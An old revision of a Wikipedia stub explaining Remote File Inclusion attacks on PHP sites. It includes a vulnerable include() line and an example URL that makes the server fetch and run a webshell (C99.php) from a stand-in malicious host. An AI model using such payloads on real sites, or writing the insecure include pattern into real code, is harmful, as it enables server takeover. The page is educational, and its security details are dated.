Jump to content

File inclusion vulnerability

From Wikipedia, the free encyclopedia
This is an old revision of this page, as edited by Pm5 (talk | contribs) at 06:13, 20 June 2007 (Links: category). The present address (URL) is a permanent link to this revision, which may differ significantly from the current revision.

Remote File Inclusion (RFI) is a technique used to attack Internet websites from a remote computer.

How the attack works

Remote File Inclusion attacks allow malicious users to run their own PHP code on a vulnerable website. The attacker is allowed to include his own malicious code in the space provided for PHP programs on a web page. For instance, a piece of vulnerable PHP code would look like this: 

include($title . '/archive.php');

This line of PHP code, when executed, yields a URL like the following example: 

www.vulnerable.website.com/index.php?title=archive.php?

Because the $title variable is not specifically defined, an attacker can insert the location of a malicious file into the URL and execute it on the target server as in this example: 

www.vulnerable.website.com/index.php?title=http://www.malicious.code.com/C99.php?archive.php

The include function above instructs the server to retrieve archive.php and run its code. The code does not say what to do if the user changes archive.php to a file of his own, so the script runs whatever file archive.php is replaced with. In this case, the script would execute the malicious file, http://www.malicious.code.com/C99.php.

This allows the attacker to include any remote file of his choice simply by editing the URL. Attackers commonly include a malicious PHP script called a webshell, also known as a c99 shell or PHP shell. A webshell can display the files and folders on the server and can edit, add or delete files, among other tasks. Potentially, the attacker can use the webshell to gain administrator-level, or root, access on the server.

Why the attack works

RFI attacks are possible because of a PHP configuration flag called register_globals. register_globals automatically defines variables in the script that are entered in the page URL. In this example, the $title variable will automatically be filled with http://www.malicious.code.com/C99.php?archive.php before the script is executed. Because of this security vulnerability, register_globals is set to OFF by default on newer servers.

See also

Code injection

PHP: Using Register Globals

Stub icon

This Internet-related article is a stub. You can help Wikipedia by expanding it.
Retrieved from "https://en.wikipedia.org/w/index.php?title=File_inclusion_vulnerability&oldid=139374108"